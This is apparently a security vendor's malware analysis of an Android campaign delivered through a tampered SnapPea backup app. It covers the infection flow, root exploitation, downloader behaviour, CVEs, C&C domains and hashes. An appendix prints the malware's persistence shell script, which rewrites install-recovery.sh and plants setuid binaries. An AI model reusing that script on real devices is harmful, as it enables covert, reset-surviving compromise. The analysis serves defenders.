Adware or APT – SnapPea Downloader - An Android Malware that implements 12 different exploits

On June 4th 2015, Check Point discovered multiple instances of a sophisticated mobile malware campaign. The malware was previously inaccurately categorized as part of simple Adware campaign rather than the relatively advanced threat it actually is. Subsequent research by our mobile security specialists has found that the campaign consists of a set of malicious applications that are being automatically installed on Android devices after being physically connected to PCs that are infected with a version of the back-up application, SnapPea.

The attack, which was discovered by Check Point Mobile Threat Emulation, employs an extra-ordinarily large (12) number of exploits in order to gain root access to an Android device. This is the first time we have seen this many exploits being used in conjunction as part of one attack. It seems the developer has collected the exploits from several known exploit kits and employs them one after the other until one succeeds. Once an exploit runs successfully, the attacker can obtain root access which essentially gives them full control of the device.

This goes completely undetected by MDMs and enables the attacker to bypass any traditional security mechanisms. It’s worth noting that despite each exploit being part of a known Root-Kit, this unique form of implementation means that only an advanced sandboxing solution could have identified the threat.

What does the Malware do?
Once installed on an Android device, the malware attempts to contact its C&C servers and relay various forms of user and device data. It seems that the malware can collect data about the user, device parameters and cell network information.

The malware installs a differing number of applications without the user’s consent. The installed applications are currently used for Adware while clearly the activity can be changed to serve a much more malicious payload.

The malware has several evasion techniques ranging from the ability to hide its main code logic in system code folders to reinstalling itself after a removal attempt.

How can a Device be Infected?
This is a relatively complex Android attack that is infecting devices via a malicious version of a Windows backup application named SnapPea.

What is the infection flow?

The infection flow beings with a user installing a of SnapPea on their PC
If and when an Android device is connected to the machine, then SnapPea Android component is installed on the mobile device (with permission from the user).
Once SnapPea is installed on the mobile device, repackaged versions of two apps (Daily Racing 1.3 and BatteryBot 8.3.5_zh10169) that contain malicious payloads are installed automatically (without user permission) and begin the process of installing malware on the device.
Using the aforementioned set of 12 exploits, it obtains root rights on device, adds itself to boot and then starts listening for CnC server commands

It seems that the malware is only installed if the flow happens exactly as described above. If a user manually installs SnapPea from the Google Play Store, no malware is installed.

Detailed Analysis

Execution flow
Exploitation phase

Decodes from string two ELF files and saves them to own folder with names “.service” and “.client”
Decodes from string APK file and saves it to own folder with name “.dler.apk”
Iteratively decrypts from string and tries to execute one of 12 exploits to obtain root

Post exploitation phase

In case of successful privileges escalation, the application runs a shell script (Appendix 1), which performs the following actions:
a. Copies .service file to /system/xbin/.ext.base
b. Copies .client file to /system/xbin/.b.
c. Appends string to /system/etc/install-recovery.sh file, which will execute previously created file /system/xbin/.ext.base after factory reset.
Silently installs previously extracted file .dler.apk. which contains the downloader app. This application’s package name is com.android.hardware.ext0
Start activity com.android.hardware.ext0.WakeActivity from the downloader app

Downloader application

Installs a receiver of PACKAGE_ADDED intents. It will collect a list of all installed applications
Starts a service which relays a list of installed applications to a remote server. The server sends back a list of commands. There are two types of command: Update and Uninstall.
a. Update commands contain URL, md5 hash and package name parameters. During an update, the downloader removes the application with given package name, then downloads a file from the given URL. If the md5 from the hash matches the md5 hash from the command, the downloader silently installs this file.
b. Download commands contain package name.
c. Downloader uninstalls application with given package name
d. Downloader starts
MobClickAgent with given SDK ID is activated.

Appendix 1. Installation shell script

am \”am start -n /com.android.hardware.ext0.WakeActivity –es channel_name “channel_name”
mount -o remount rw /system;
chmod -i -a /system/etc/install-recovery.sh;
echo -e ‘#!/system/bin/sh\n /system/xbin/.ext.base & \n ‘ > /system/etc/install-recovery.sh;
chmod 755 /system/etc/install-recovery.sh;
chattr +i +a /system/etc/install-recovery.sh;
chmod 777 /files/.dler.apk;
pm install -r /files/.dler.apk;
cat /files/.service(zipservicepath) > /system/xbin/.ext.base (server_path)
chown 0.0 /system/xbin/.ext.base
chmod 6777 /system/xbin/.ext.base
cat files/.client (zipclientpath) > /system/xbin/.b(client_path)
chown 0.0 /system/xbin/.b
chmod 6777 /system/xbin/.b
chmod 6777 /system/xbin/.b

CVEs
While the malware is utilizes 12 different exploits only 2 of them have official CVEs:

VROOT – CVE-2013-6282
Towelroot – CVE-2014-3153

List of C&C servers
oc.umeng.com
msg.zolmobi.com
pay.fastmopay.com
alog.umeng.com
app.adjust.io
app.adjust.io
base.fastmopay.com
d.techcdn.com
pay.fastmopay.com
api.aedxdrcb.com

Hashes (SHA 256)

DAily RAcing 1c67bbce4af955b47d9b27037a6f063e06e08e500f1daaa3807043242a64eec0
Battery Pro b066ed08c0a1e1dc074edb852678df2d48f7f5fcc88d80dbc787822fde84e455

See how use cases come to life through Check Point's customer stories.

See how use cases come to life through Check Point's customer stories.

See how use cases come to life through Check Point's customer stories.

AI-Powered Threat Prevention

AI-Powered Threat Prevention

AI-Powered Threat Prevention

AI-Powered Threat Prevention

AI-Powered Threat Prevention

Learn hackers inside secrets and beat them at their own game

Learn hackers inside secrets and beat them at their own game

Learn hackers inside secrets and beat them at their own game

Learn hackers inside secrets and beat them at their own game

Learn hackers inside secrets and beat them at their own game

Learn hackers inside secrets and beat them at their own game

Check Point is 100% Channel. Grow Your Business with Us!

See how use cases come to life through Check Point's customer stories.

Adware or APT – SnapPea Downloader – An Android Malware that implements 12 different exploits

You may also like

Shifting Attack Landscapes and Sectors in Q1 2024 with a 28% increase in cyber attacks globally

Not So Private After All: How Dating Apps Can Reveal Your Exact Location

Agent Tesla Targeting United States & Australia: Revealing the Attackers’ Identities

Beyond Imagining – How AI is actively used in election campaigns around the world